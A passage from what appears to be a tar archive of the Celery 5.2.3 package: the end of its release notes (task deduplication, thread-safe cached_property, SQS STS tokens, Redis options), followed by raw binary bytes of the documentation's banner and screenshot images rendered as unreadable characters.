SUCCESS, we log and bail instead of executing the task. The task is acknowledged and everything proceeds normally. Documentation: :setting:`worker_deduplicate_successful_tasks` Terminate tasks with late acknowledgment on connection loss ----------------------------------------------------------- Tasks with late acknowledgement keep running after restart, although the connection is lost and they cannot be acknowledged anymore. These tasks will now be terminated. Documentation: :setting:`worker_cancel_long_running_tasks_on_connection_loss` `task.apply_async(ignore_result=True)` now avoids persisting the result ----------------------------------------------------------------------- `task.apply_async` now supports passing `ignore_result` which will act the same as using ``@app.task(ignore_result=True)``. Use a thread-safe implementation of `cached_property` ----------------------------------------------------- `cached_property` is heavily used in celery but it is causing issues in multi-threaded code since it is not thread safe. Celery is now using a thread-safe implementation of `cached_property`. Tasks can now have required kwargs at any order ------------------------------------------------ Tasks can now be defined like this: .. code-block:: python from celery import shared_task @shared_task def my_func(*, name='default', age, city='Kyiv'): pass SQS - support STS authentication with AWS ----------------------------------------- The STS token requires a refresh after a certain period of time. After `sts_token_timeout` is reached, a new token will be created. Documentation: :doc:`getting-started/backends-and-brokers/sqs.rst` Support Redis `health_check_interval` ------------------------------------- `health_check_interval` can be configured and will be passed to `redis-py`. Documentation: :setting:`redis_backend_health_check_interval` Update default pickle protocol version to 4 -------------------------------------------- The pickle protocol version was updated to allow Celery to serialize larger strings among other benefits. See: https://docs.python.org/3.9/library/pickle.html#data-stream-format Support Redis Sentinel with SSL ------------------------------- See documentation for more info: :doc:`getting-started/backends-and-brokers/redis.rst` ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6157534 celery-5.2.3/docs/images/0000775000175000017500000000000000000000000015072 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/celery-banner-small.png0000664000175000017500000003353000000000000021440 0ustar00asifasif00000000000000PNG  IHDRX3KvlgAMA a cHRMz&u0`:pQ< pHYs  iTXtXML:com.adobe.xmp 1 xmp.iid:CA15D7FF9A4C11E6B7A5A5C86626E854 xmp.did:CA15D8009A4C11E6B7A5A5C86626E854 xmp.did:45B92D9B9A4D11E6B7A5A5C86626E854 xmp.iid:45B92D9A9A4D11E6B7A5A5C86626E854 Adobe Photoshop CC 2015 (Macintosh) >F42IDATx} |$EnUwL2̓eKQE7("A HWQTW]=^."o(XvlI&ϙ}]Id2$3LIOW׻׿R̃66u-q~s>QZQBCa"+P&W.~]eɤWxɜDiUIe̖N2 K^7N[^]K9H,+"kw,[ZӇa8ϒP^"kF,YX:(&bܳdq&Δ(t)'ߤ3A#kr1y+su@Y|<L?yyzUWgSZQ/P\QLJBȲN ]Wu3WWʕ)I!c&!y^2h-[݁`u7UEj)+R'l"a WX[JckWl}s^[kJi˖6{M\*>}2tE !=4{}HȢDtcu<z4ZʖƜ!Pzjg#J"Lh?Mr+"N|,EgQD^ 0\B"6(C8b| Z100oXXogcg+%RP6/>9-P'KN&v|g#ʻYK2FIw(?ee&1r:?8_;9w7GVk/B} Lۂ%ԗAM8ЍG,i] uLmPa㣮?!\-mh3g "֟<=jIu+[ת\]V{Bz"}P' ۊa 7=_ʳ<锓elU(۾tHvPCČ AicPQ]Ɵf6d>"E7){ BB|66)Jf&X蒑~f)P!)>iiQ+O5j_KR))Z<D Y,V`P^:&쒗5j>*TAx-r1f(nCCmys%wEWWF*A^tHN !鱷=̮hyW"iw|u=c! >Po6! VJ5+UO]y\պmYiB.e](c0dL p5`Pʫm JF[i# B$V= @ s \ne/w&гZX]PDzb: FԝDL1/0XKD L4\SRѪ2S 9v@YҘ#j,Ku |+_!C(Rgiu]  18đ~!'%&塎f$םq2t!ZMI~;f8vU1Fk~Mϳƽfr+ +;<8Q,=]wP6lj\j  \h}XqjOciSz-W{2?2*}ړy>+'kqcES3fz_&R%6ħa )3)K& |GIV!h\n@gc!H&dQx/R 6*0u/SazBt9b!qVl” qyFSYީӁGL*h#!PUbt]ߞX=RH[*y6T 5:׋^ ˉX\ھɟc%t8Uh/ցrb2^26_d;/875 cYq,P; E:`jc7n* |_ {%'㮢o{hIDjr!>Φ>k)ǎC*֩ pxj;r:WW2 J Ce2zm.Ǒ?ACB9Kre ֕GN=t:M{B{D-+(|2}rБbd-)A p waXVFXOe&2bw P邌Nƈ7]"~/P>c,TfiM⚜nCO;|mvEm Ӌg&T7r-Ӄ/h3b5-\y `Ir}5ni"XE@ip,Vڥ0e1TӇ.48AxOqv hjo2Xƕ"K/f")RA n3"FiiuՉ\ h[BͨG!+:Q}פ>uN~ζ /Je6m+ c18pO 񣟥\3lréAEn C|"LOesɷ A }+!S5Ŋ.,nҼ\HhaiQiBk(('у**f~r q|x}$jmkmPpsLXiYyJ3,|u0_ V)1cȝ+vb3= ,46#f,y;LZ^;n gr4O2ЏPΚKʳwU^20~zxq jR` AĂ͌zoF =1@a;ь111K>WyEF?MaXz' ^RҍdPmGZO(AAږ@7QK%jmnć!5jgQM\(jq${߷_Җk9>?QFvF(1&qT3T3IƔ[3~D/yGU[_4n/7ԄؿH#HZH9dZZ܏aD`"CwAѮoߺaC+ba|9*X+v%2 S7fBejixaѐbݧ|-3==N@uD˔QW2EY>G Es?ޑE;CKv:.vM(B0[Sbt࡚UGA }bh,lk'PQc B'8*/'&ˑRK+*/! d銔5Cex y0>cDPꋨPSȱMH3J D!Bu5̹kZR 혗^ +M ڰ^%l"cMa;Wd 'i ߙ?Eχpu+ŭ~F`an]Xlbo5a)o3v3 e=Qo_],7| L՝@WOr"F F F`h%-gbMIi&?W1T<LS\6>p^E0"BHA@k(\î,\곭ج8\'q.2Gˆ@7&r85 *ॗʹ:#k{uR\ 'QE"JEf#I֋n?BZa eaI{+-*'[, ͔j=Bo0|h$Ž^r-u3Vt0Ԋ~21kXʕ :vcJ pلu-iy9)= 8Mwlc/! H\A{+}T20ia p4bЌVD8mϜa,j.[< 2}Tϔ h|ln{X q!ҳX}FrؔF'J ށ[Ch }M0R(-+7\MFwb.npTg" ْ`!7VBsJ,~6zNj|׻ \0t>4D"hu#L5(i`/09'tՎ-sTcZ+jeZkpGȴǮ)Q. *q4%f5kV{dFF +qTJ p@#1IuJXv fd5#9l|IhӼhF CP?s,`iaKK ũ§!]LGtpj'&p&%U#0J_b50fTPQ_hq* u~~,ufrQ@@!QF8D_lxuu>o6ʤ#V {w^:߃i'Z»`45ȩy N2Zi*x8HZ,9G&q49 rs:(fb83Ốυ'v'"S>4)RqGrFᾋJ=io^`p0Ux 0ŴVo Ϋ qZ2ina7)Mm`w]*:vPqB]z8fm̄7kgwV, F @?oo %;> k$Kx2S&pc༧g"lَ{P@&4KV dS>oWg9ci rZ<v0 XH\WlPh4,fւ.lMt\jj LQOpRh>pE"\1-?H/3MpjP@yO 2Psaq,9#b)?yhU,a;ѫn^T6eew ,ʭ15vjpM~G+vټԲ,iЈ,SCռ9jXGlo 31Bg@֗peүGx)4nѬlu?[15xSP s~9D>8k30sr\/0Np՝%_T*ӣ}x>ă!PlY n3%g0l^ކ?c镜_LU+ wL we& o_ ո[v8Hd0n, #J{M5GǕ4-Ǧ͎ibQnc:%j)CcM.G >e4%aS048D[wT%X ,K ޞ-/%#HUZu0OuF \/fDĺ B aZQ+evnᖣ -O!7ئzp]NOn]%A%ڦˠ(raǧ<ÃyT\[j%ժ nk1ܺ֒GPƊG5/ ;CZ"PήY`˩Lnmh:^ wB8#ѩx hOaPgXO!0W˷] I`>ftq!GƊXWamˤ;a\֋+ʲN;*C;=g Ƣ»#pB)я IZ,+)3YeJ'"r1 \(* jlL<^L5Dy!_y6r^ (%1ᎊd:ȨjiMЦ_uJmCE=g2A,x(^|k DX1,wgyi /N=Xl'=O,ܑTLUl#O ]1÷4c+~DžN64,υŎQQwl<ƺsF@q]΋)| lm˭h&LoNYébO7X1+HOavߙ$b'szcּ6 C^_̬:? _sA`H4_N Gsqv͹{(тʦӯr-F{7xhyDm<`  x崐Q Xbl^H)8 nϰ BZ_:*+fbp#?؉111*o-l`NcWhPu#(VOG[͛7\_C4R80͊nB7Q*uGrj1IԋR4F=cǼ16a_j5jZP5=(2~bQHKdC#c[L㣅AN<5Z{m hhoK!\Uؖ#f^4lj&jA\tu}_Xʪ~qr`\~Egq;xEZ#ΦC~'sb33gb볅=hw Nbj ƍGoX1;b>>aӕbƟ<`OI%j)6Y#>v"`%pwSO:_=LO&p"#c .)C"z#ٓ:?E;%pqi\Fz؆Syکu|&d՜ɋZsU=bԛ3IO ^*~3!(>c+F.-x;cZz/DI[d|M$p%ya@8)1V| f:4"jhe +=4E,S</G -1vM*yf)8+| KG!K(X}tC(dqo>h;HX2W.c*U,LŻ_G{ ,Lt<"pʹ6NMdÏ: j`L!|J埂BD A7G{初-\󻿌o[.rA%_'(˓HxK#A7r1TPET-WעaG峴-gp͕aL>죯9l|uI(I9gF\هX7Zq 5_PE`Go Gh09"0E8]cq]c:qt Fl u1e[7*TNށv"ۡ9mham L罻vVqr̷@w/P@R'P82Os HU$bL+nP<ȱ_8YrbڈR> \,೔eɄMlL| `Fa۔+yOBXs xb(fYhpr#%&|Gkf[ `@$r?,_g|mdĽ*D~SyJy(b#C@NFQ,~ G9U"u}l *a(!8EH5ʏ{7lqri z}1P}eۗ8x:Hd<|LyXhFJ3(ݔZVE{S.d?Aږ&AY5씗) GP@p:r m`'gZI?TKG_e9_bO 8wG"׹FrޖlnY((%(ڜ r'}YuN}?]zNaL"8F*W97(@Y閍F!FjYkʶ~k*#lP(pFҍJbV7hIaògB#Cb9 k»;x6s"`q`  Ɵzj{NA|5ѯ|,.#-EY`Wa\G QO<jH\/E5~^I9|_Ma\ &ToShhBdq⨏XvHݒ DYT^i%vYx_g! ʹp(Zy_=׆1Gzw tڃ?ϲ-쾒Gp9[/7src#SvjMuvIS-%H8Ido!n5v{(\+ʲeE"D.Y·sPY>d0܇!uY=? X\Eb٦͈%WgRc>ŒRքU'4DAɮLBxrqg?D{{.U+wia|QJ#eʼg#3],,fHcXWZ(\ypA lihC ;פlV6k526h-Rpj9TIENDB`././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/celery-banner.png0000664000175000017500000003332600000000000020335 0ustar00asifasif00000000000000PNG  IHDRX3KvlsRGB pHYs  iTXtXML:com.adobe.xmp xmp.iid:CA15D7FF9A4C11E6B7A5A5C86626E854 xmp.did:CA15D8009A4C11E6B7A5A5C86626E854 xmp.did:45B92D9B9A4D11E6B7A5A5C86626E854 xmp.iid:45B92D9A9A4D11E6B7A5A5C86626E854 Adobe Photoshop CC 2015 (Macintosh) 1 2XIDATx} $EnDfVUwUWL "r*OYsfEAy *좋ҨЧ(ϧs{`QB,f,IY#*YUg.!#%&vÇ/Ы:tT{0Vɝ(%hrXei!odYmjr̫݇v;B{{XqHsRȯʘAR Z*yӦeOO X(G^ 4Rl"a WT[Jck"dضYRNTi˖6{M\*>}2tE #=|3DɨV w]5 4d;R<!ƷMHk!d [1[癝U$`^m,/>9MP'KN&*"QZq`beRnG8G9;"p, ~$FN[' zǸ8g{#j͗vRo#Ab[ЩB9h^h% 7ӉnA OL~A)"7mh3g "֟<=jIu+Zר\CV{Bz"}X Em0x7Dʍ?ctɲRM6m_f{P?ņ1&lȰ'}#DnR\Egc$o\~f#R1S|L/ Al" vVNٟfiykXJ(tOǒeJ%@ YVa8P^Nu}!!`%/k"c|UހN[cb0nkWtw Zġm8(t4+JN !mζ7FKX亞1FiQHAձRbus3W/Wh[ccPzK`kg0dL pUf0k([U/F%CKezc#-.: X(k6Dlo)ppп)ߠgjݱh50!= *;PLR<Ȃ84it.?TrD`EZf@|`b|VUḿ<1@XVBP<ϿٞuyF6ovX$hG+% pO\ Z΄9z6&I~f8v b0$Z`[Ξ~%L$PT*y<`l(ո@Ajo}XyHciSz-W{2?:&}S{ bY@͓oH`(fF@L,K&l惉O dSfoSLjf7ڕи܌BMȢby]"_%&2lTai03`Dx_0>?ə1%}3r2m1%Hm=58vdGBUeu~{bUhqp"aU>2m X/ d?xju2c ÑJeD{!oܰTˆYz'u1HĹᙺi#P?*՛<_ȣ/C>)Q˒gy@ڎπq5.cP;q3;O۰>Wz8,ֿfN&o;SlӶ-z0b W\~pDw!ֱjXPUUb*k;(mv;1dPRR%aeamu周Sݰr^%^ }6z;o*o=3O ;5L%42oOk^z"nw Ln-\Z_v/djZMMSM˸8^Dr)ŬY}߇enЂیAqbZ{]ub*V@3QȢD{JCԧϩَ/}^lƔ4ϛk!?YΛ(%p0Ín85;aBĂw]6|0зJ1@];Vtcq;bBcK{dt/O_C@9^P8u7pSD>6ym$jMkmpRps\XiYy3 < B|.X0ƌm6"w ~ځZJxG/46#f,y?L.I?uT39ZdB SG(g-ǥqz@4FGFGL- wCCGo(EJqztхg`qh#EybzIGx8U*ؔ{Ł%z\ݯzyҹSu[SCuCr*L{"dcpd!12-/ZQ8vk:eeZ>L;WzQ+6n CE__eXa^(32)=AΓ{û5)0 bAuafFHJxA^VK?h%@>I+#?jO7@y/jJ.*TېƓ:Jt_F"jLmF+@ԚYw-ZbAomZNqԃgLcZ.#c7=cؘuKw^ԏ3EQ36悔jtK2ƍ~Wp*;=idiΫ%3--V'ƊC("㡇;!}pom^]F1ҰRVy`݂v%2 S,Beiixaѐ$O6Z,"g{zc)elx}K/_Y-1eOZTB~_AG*v]~W|q5åPu?era)οkآ5'Rb1$h%sjx%qLzڎ5EW7!ӫ}<`/9B5< jd;8Ncy+o W+z##+Q96U|JjᶥqC; qН]~Ӗ;"~uyB+F F F`"̤Vh yzS2z4sFޫ *dOB<~گf(J\L;DIr]rKd"-`jXQ-^]yp$y-l,۲S)Gƾz˞u_p Qyz ;=VO\LcKQ/Jb?y-bX-uO\ggt࡚NA })bh,lK'PA! d F#*u=^߃YA0b@|+|W !W8(TP>a+Rf`U@⁢7?p!̉`a{pXgbʅm1[$Z^g K$l5rcyu$j RXWo@ZB x4FZr|lĘwD ~B_*0#6 |E}>yM}ORX{$ ̷R<)rgBƕ<9::E`fAy<S'xf"gC~EwC:tK~p`Efm8# ӃՌ.Y웯)YAJ TXE6ᛮC WBh[0f!) ep|'vQ2'8߇~?_X P-|cbb!F*"ETr` /GW+, Mzϗֵ0iK1c^z4/55hPj~5z p\k5 TntCN@53,'aDvƃefGqawT UR_ffz1+3UwBC],͡?p4NI)ݓzw^AiB.Yh|Wid7^E;َB,lI.@QW/ ڬ8\K''p. Gˆ@7.r85 vUK/iuFFnj?Dž۸Wpi7Ժxt-uOiIۭ.΃GQOqL@lSt{ A:^"iS-mJ*S%hL{ѧB3VZ2=s.~ena) яyξ I,+ )3sYej"n yb1pĦ|5%8Qb&=LPݨ/ S{~3H+._gc%\ðJ"  %UrZu /J˽`2KNZ(VB]|B҉,yDwlsZJm4 5r9{316 eKXG@;ǃwYü߱*V8G c2i;- G|亮`!<$G6L%z7WPk>qжV* auFxXDG)kWLN M6\\3`zS$nNT"]mirgxlLXJk^5,L*bZ(RuKɂǒŒhSzO1b7.؉񝮇WTX͑,x+VeTxdsQ ؋2Ӱ#bc Sh]/سgHV^㛂S4L3ә[ChMgᅘdUw)`=W!BT]ժwbښtG es0*nx+k(Weeep%SF) 6e|9|=nBjpu.Nzn g56maH HԚDB&;dL[UzGxσOlEϕ*4闘jfwNf:?!|iEFj>Q8˸h;0y'tс-sTcZ+΃E-ZVń%-1ܑv%2ƱkJpBVu)Ʉj v1ZG"o- $ffCEk@`uUGhXEHc$ьLՇ7G%XR!”8ũg!]LGt0P4ΰ'qZDģjrpDF髶[fLJ_**Q-NĢ/otK*׍)7j-zxy9KN-gf 6X2554߈0.n^G&\4QN]*hL;ޕ8_z n88tlMpmJppd$rd/0aݫʰ!Hr.E^̈́bR?E>__-2Ccʪ(w9haʿ}Q'M L> G[zF-!NK&6&n@F0_CmW*.W+Օ`FL8Xa01|s&}&|t8z9KpQ!PěaɣÎ:+&7l|S|sA5vseNI|vBPRiv ̂u~f @@@"`f-D5)jw Rj G \],ɡ舁a* g*$nI!y肧( 'eXD&Korúk6Z%e v<~u ʓs*2ò|OZ@YcW4KXxb͋@-˒ ^2e:T O嘳֍uvQ0atֿAe*\8@ M_g;v :B_TCX˵`9:8_`#;K>+>:?T*ӣ_tgϛ9DfYG1+L@9XR%m) /wLBzj9XޯB(86Pv%J ܲg^N =p xaNˡ3 ׆lĔk9[5[ .!\ @P0'(L?ո[v8Hds0n, 'JM5Odz[9if6;J%'w]uJr)SUFD/<F\O6ny,ˊR, q{}|*3<GkKZm [wZXUf~}%߉agXk[5 l9) ͻ?B[\+4g#:)E'pP gXO!0jѯo{wI`>ft^KCb3n0eۖIw&˸Wze%v78#AUZ!2tv{FϦ/2/2' 3=E-Åw0 Zzt.D?]V6NHbYXH2,Sz?v)0Uz QhgBQR0O hTCWGnvޯ)nȉ˜ꌀucwL&hΑ,eGTKkrC7T^+{!S5#< ҋo-aup +,${,$ܑ̚0F`@c'oiVm lhX^iJX bf+{ 8FGnP ~JyރY*^4=]Nq뎐];Z~ol[poYh䫧; )Džmp#^1 r.g^"2b ٓt_W'8Xdb)vqV:hmx y'ug'ذ= PP\T?[YcY([=9 ͱH:T^ZNkxy*< Ad18#:[!+F Fh>oB~o8=R޹#"%,0:eէ6/;OmFmvfAR/z"@>7`€*=u?+ _A`H4섍#iP\=Q(T XQe@_c4?}G&T[ lBF-`={@@M!ap.p{=R|M ֥tT0{ VFz%+b'V+UE~6s!\=̄,t+ɇ`ܑpG'&Ϣ`qr Zӈ#Wd_uW*eTm<nWZgjHVͩy5pj:X/F13Լ!y(7*/X3 (>cg ~;n^ =)s!;iZ4S7 z'%ƋⱧDkY^84Iq]+x#.p{e[ۋ)*=#Xd@Gqx0 `6ڹυرAhP}X?hƇ~jJ*jt_O~?:<&mʗ4w m EʮbYlq%N}?=ع=f͚F3!nC'w=P:wbMR@LLg@ȚR o}#Uܽ[.dyN9q"yGFQ,ڏN1'AW@?npF$}Z|ILk6o(M HU"FèrU/o]Xi֣zbci2 8 N㏔X3-29Iڰ gwMlkO*d.S)wdUt\#\fsX,98k~3gߵU2t-Q/# ))_ .D[ЇNݡ@a*kZmc)KT\9'6{՝d;HX\B!RZlcN(d٘e ׃Bh E|JUr zdL}`@"Oj"q4>K_ iL%i[Duݲ}uvdX>r Gp{˜, }O_323s>qpbG xEh%>v<Prck\x8=Α, Ǔ[LG,jA+X 49xVѽܘO04>Kpm`d$d3u˙>YG*aD*\s H9o?FRُX7Zz5ey+Q([Q, a1,^6NML1Yʇi8ii1 bj42,eY2aFi2>Q0|6ooޓn|)bX|~Ō2 Zndۤ~MLpg%X:/퉞c8m_ͻm>Mqx{(<쒍 %^cZ0_H8Qtǰp0N|?\̮RDBcatEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp MjIDATxOLUο-?Z9&h8jMSMA̓'̓/&5Kѓh0T5bC33^aqׂ<1~Yx3~ۙ}SeY ܿHx         v xY}ʹjzjU*<ϯF#)Z4Hr=_kTTP}5x(zH២5/pHp!Ձ𳼘7, x>x8I~k? @uëA]2V+H/Q"qJK&m _p/X]-C.n D,Qvn_qq3)U>| e4sIR@ ao u'j ]eyS֮ QqG^JXjLUJE_RЩB `XdIaձ~Їl>Wi< nAG솟 !]v~LՕo{wo#x ;RO)#D.|/taYf/ivձkuq'i zqë>?tǷvEU]o~k=ia~`d#ٻ?븫a(VDDq Zf#Ӳu'Bn 0HĒ6e{f%"e,m6;<Կ .#i[GWk!f} 8*| D"X䬝fB?Iu : ,i/ޝ% d'8H3Om'$A00־Y bۜO$谻;;"xUK]MQ_ 1yCdÉ&l)Ht29 XxkJ\>5\|u{EXoم)77g|Aㅞ-|z3L=%Rɼ^*ブ`Ħ=ƋQvY8 3nL&f46;3-fH%Y8%6NFV4hEO e}]-IF≂ȑAQID#Yܐ@vϤR=(GbuUm2x|쁏zUQYo!1&f1DC=c F^70F1T4E|'MxO/ cqDVuyl$PE,O6 3:rWhN]!Y=c>d-         _ Wa]ṈIENDB`././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/celery_512.png0000664000175000017500000002072200000000000017455 0ustar00asifasif00000000000000PNG  IHDRxtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp @IDATx p]w}'sߺҵ~#$1I«nBa*,envHJ-dJg6ZօN4fhguxMbO !!/DzY&I|_,X{kZ                  .                  3\.g-GˆP[C jMPTO::BUt`IP}\|RO|!_*rJ.$)OM+NPá uOBх&~`A'sC=ovNU:u }jj^)t 0wP /cLgB]%^3YK*αZy]g2+[o&] !u!<* <5 P&'ȨR#YQY5'Ů $Wkox> `&/MM Ulzw; em uEOyI{Oݭ~W>W[1]!|ZPo&}++IsC3+fhӮ uM-Po  r]s󏫥IvJO|B@:G&zC@sto&B>*|U'C]}0 @Ӊ?zoz;d_׹W[tDq Lr?е[M/żқxӯt_ꃡ.va/ \+ȤKNO@fzÞC=߸d_z?;7K_P;Zz&'@wdUm}fN683+aOߒO 㪥du9IGiAz&W>'/3+a<|*9$>2.]_YL4cnmJ"WPfL"ٍ-$kW ͘md2H-&Xɺޝ&g,Ca /ׅz1C39Yk}t%.0~ٗ޷vN2й)-]P,]&8. f»lm>gCg7Y߽#)Kqvlo&rS@;77v׶ L/B'ɺ$+:Vkٷ-@Kn e R 'gQ*L=/}d8 dC&_Y6 L7Po1.q(u'{v:o5"ɿ^  dCώ;膗<Lv8t''$Z05UW 8*+a?2tO%_&?K% ShGz}sMESg'9lB48? b-wǭjCsbƱQW;Ms, }T&目6ڴ6tlQVs"7yɿܐN0HH< k&}55G_0Ov&<P9@*Ůd͊5 u?yVwO9@3??)yo ui?x''a$|3TY␞J#Ϟ0\0u uġcmۏ6tm>o3#]_9~nuL_`+az>~:Jݚf{[g;&rw5ɪڠFwBݠ&x deVh~WLCu1COu] Z`D~g{j?@< RM#F3mG;>19|7T1ÚIz4j$' uOB@._VN>И"Qt'=k޿}T=>ua]oh^`_l<iktm>NrdOSǞj5 9_3{"G/ԭ6j^N| +kP_|\V'=Dwź /҈vQZtVzbnPMYs[G< "k?&fugh4~[ w) 3YgCC@\{}Q>'{߯o  _BwGׅl]o.VYêޭɖǴzue2 .+{ĴCKڨ76x;cgS,`W:V˻ "}+{*Ԯ0?汞!4@+dVģX(g6[ @|ۨ/Դ@XƾcTB `Vzبk q ` @U x @+O |WkeFT`6?s:;bD`j}r@ r @LgVģjfis:Vģd*X`IGY7Fk"Kň &dkzxxZ*`"kݨ/<VEFu~amMĨ/ܯqhdp/1 G {D M`_eT U+9]76DFI-ٹj@<dzI}^idf08dRFvGL'Yo:< ̴ PF ,n=<7gtgD&fWR_V%zѝ[]Kl5cYܴ@sHlFANo$R#E5xNmlj'iz @o 0.ώFyvmGUaա>ng L`+ZdzBy 0@DI9M\!PuDZG[Fzk`1ǰ9?T+' Jw}&|A3Kz%'`4X*0_(;@FƞJ?kDI/|?yVR lbtw8) LYn3CmmY]H~J7 <|gr^ғ3޻h+n:xJP,hFH )}Y_G\Uh֓{d>#Mc4E{C8 ߘ 7O(?4TnG jr&@G9߱wP,^cǓI塱m _6 !`T)Px8؉';!=\$ Bt'$KV-U*}[IЌsޒ+{P*n 1RHo%nJpX,K5&qH _KqX|S!`ZBW @<k⚼sQ07򆉱l|P,s7(U4cq4v]a*wT~#1Ⱦ0==y4cqL.;{ }UG~~e,{mdر@\T(+8{ޟ8g=mBcoϷ*/$mtgϱ&߹䀘' rV`v~r|E>w@'F?o6M *VnաP0E+ a>Ѩ@ſ+ɺ'+{69.+GC]&~20RO?w6q+| ɨ߹{O`(!= էhO7kCl9Xq|ӵfrE PLV7P %̼"P }h a`@@4 4jv u͙&̫FCfcWKo*߽5нqX,ucW.ff.W$}}ucRrLzO?_X0zPo [ {kk}+wU\~wPO_8л!lo5V,T+kXwᮎBP]o&}Ozuӷ `!rB?_VuNR]B)mvU{wUw{RZ j,uP\}S$,^|iJZ#{0|* @ZaJa4  _L*fGyXG6R)vzPiʇ/s$ɕ\~T`hP{BP¤t! .                                   ֎q'fIENDB`././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/celeryevshotsm.jpg0000664000175000017500000022712500000000000020661 0ustar00asifasif00000000000000JFIFHHtExifMM*>F(iNHHC   %# , #&')*)-0-(0%()(C   (((((((((((((((((((((((((((((((((((((((((((((((((((" S !1"AQa#2q$B%Rb&34drt6CuU7DS5Ec11A!aQq"#BCR ?7I}Ȱ-:Tڂh$!J$G֭f<|GchZ Z<<7+{xϋjM?,p>"(3)uy-Q4G-(57oT~6((Ap}Yŵ&~Yow?M}7]G2=QjɃLcR.':ezHϋjMeG-k1:,"T$=V"gx i~"Auy9-EۣC Z=liIp+ԛed|EWQ~>,Xz9 u)9O`kfi".(mI'qq YiPV+cGu2EVJPV+?ɖ(|WQ-"VJPV-6Fp>"᯦ƙo?(R]G[;E|[Rl's~҂n#ezH]u2=QjJ ŵ&ouy-EΙo(5ړ`?,(5eo⺏p,]uNtO~RmI'qq }ݏ[;E-EOLe(R]G,w?M|ڣy9e8{ecQjJ ŵ&~Yo<|Eƙo(5dl]uoG鯟ԛ3{"VZPVQcL_~ Ιo(5dkړ`?,(5uLS~R.':ezHϋjMx8WQ-"Au~l(R]I-?(|WQ-"VJPV+0eECu~\i(R]G,w?M|O-jJ ٺs[Hkŵ&ԟ[GQ5eo⺏v>Yo~|WR`-EVJPVRyɖ"?u|1(5dkړj-kQ Z+ACLǑy*ߞ=+*0B1 p3iۨm[C P@w zⱢt7TqԐRRHʻϧRΧ]cۦNY-+qF{Zi;|ۚɳM_kJKl1ߵt:u^{vvdޭJCMC8(IF}qa:R()*B;v)f iP.6N9jim~nvMẝecrB=3XTp1LT S1@1LP)LS S1@1LP)LS S1@: -CM eKZRI^_Im%m%c ӍuJCpM>gpx&Ō-ɔ.7)Nr7{z/10$*,دAi;>^mjs_^66$#r99,揽:F<ٝhħ b6Gg;-k\(H]Ȏ‡j.rIB }yX2aǐ;u}$9šP4Kj2[=NX'" %[pF*(kr/?ً0 `eN`|+1D9)o|oOWwVVgt[ݚO:RisPY  ڦc- ]dO%w!;J6T;F*'Oʴ>\{6ZҦ[d8& SOFP-8=B5aNmo Bf*kn)HS@`k4\$.Y_!J݄xDȌioi20)s!)VK PA857G6|]yˈmEJl;|U?`ZM:lK ,N$W_#SbW) +]d%:VNs5hfm}tBBRRGcEjFE4 XPiA*ʙFn8?7AJvD1i7uyYA8R6Rr }J)mi(QpnD$c洩F@BVeeG'̮Hܬ}M ÷3 !!  `PM NYDRŤoꩾ7nOZҏ"tS 6]DtRHpUNbVv}£2i%A% qQ5m-*\9%¥qo$}0J,1j+i>C_ҳz;IsLTúYO\u% 7-pI+2v+]dƔ>N4i5pNݸN=UQ˕]pۈRX)8XI'-.EuBQ*OS جc9槡Q/Ln.%i;pF?<EG:&F!jZ6xĔ~=ݹ;}I|n&L)KK` 7);ҝ ^8"CiN!.SJFv7ݿgJ-7y/5f[0JB m!%G8 r̴_.aϔ7vچ^AV2'dZ괣Q;$%2)ca +rv%#K(F v$Ei="fm%K-q(N0EbcvntJD)MRвGBJ tV oOJeL@5 SQ!͸6Y vr@FMye0vz`,s6%[I;L"d>)m)@LOO$ycl)[n$;l(Xy'SA1R퉝inKnKlHDZ)VBV-yT{=qv:_KSl4m!)NV$)EjDc'ނ_&?̧M2STbIO*ȶOmғ>,)e!gU:fs-NF2'n8@jTJ7 ,ۡ:V8+ZHF{wu6t\9'cAqڋP]Z,@`v%Dc+Bz7]!m%7w/GuƊ] *m(%+p0pr}3Q0>|]aT^BS3A8x$jkQԗYLu^@Cάєw_zdO^K:<|tK#(H@yxWzin Q\m(6Yjrr1~xӂ mᵪ:^t-eZ`@>5H[<.[m$2(oPjȿiٗ9+ct$,;!`DdȪ=T VP1'^HKHG (NΫRԫ]O*2kr j]ߵ]Pł5U,Yht-:% Wؒ=@ϛ^Yj]ܨQl9UYwk۔) k:o7Ԓ5 ?NchI TmA҉-<Aa*@8ݝcoT|Mc ]:7>.0][mT1V"D^9hu-f2T?PRN}|7KoKKϔ1wtL=#-dJBɪ"DމXmĞ s񫓿h=3Z~@E<-6h'vHu)kq9otHqSR.pNJzZq]KD ΀T2*0SkWɖ۝ȖF-&PLH!>_@G MSSdiHC{KB% +SWˏ,Yέ{zJBPN >}+Yn4잊ڔ# kvg*Q8ro۶)FBT#/.I)qcSOQx d''C`%D(*JUÏ|`1}\ 4@p!Ⓑ J?»}*2m<=LDouPzڑNí^u Z YZCan[H$;uG"jկi !Yh%dd9d@vt})LK8yjBUZ!rcE/gzSΔZS=*vB|fgf6%GvNUsR j?2!L#ޖT\--nJ Hx`BFmRNKo{ cS1E͝"Jw5T}kKlQ(yJ^%YۏzV_mZr#5[rTaKo7*/.egZaè^,-Sm(|6o ㊭x6#h?KR4x6#iep-T ^צ'԰R-p0U3?ojwSU7wūO8ьܷMۊ8v+84m2\]5 2GZ\ZV$rN3+I+D]u)JتgRЄTFJT56]^8L+uHSJ  o_U|MyLuꆊHT3sNJanѷf>Zg!0ShRJ>rJwN+/;-,3q7F)X$ps5FKC?pjSa*!@u;w6{ds4l:ZnѤbLPp$g;Aҙ̍~ҴqZ8 ' cKI2W} 1;OĺɃ#)$.·~.ھ.+td1s޹i蚸|N:zZUE2R#8QmAJScT3-Iq߉$1>iCWt%N}_0\Kh"<Q[qk9~W/iVyF"Zc:tu(#;Y+eERoăP}k 쬁l%JXud'}u,2TR ?.޼ٿ:1XR~ҐVwu!}Uy+JTy5m-GS݅?E? Z|>?ۇզkGZUkQ=u 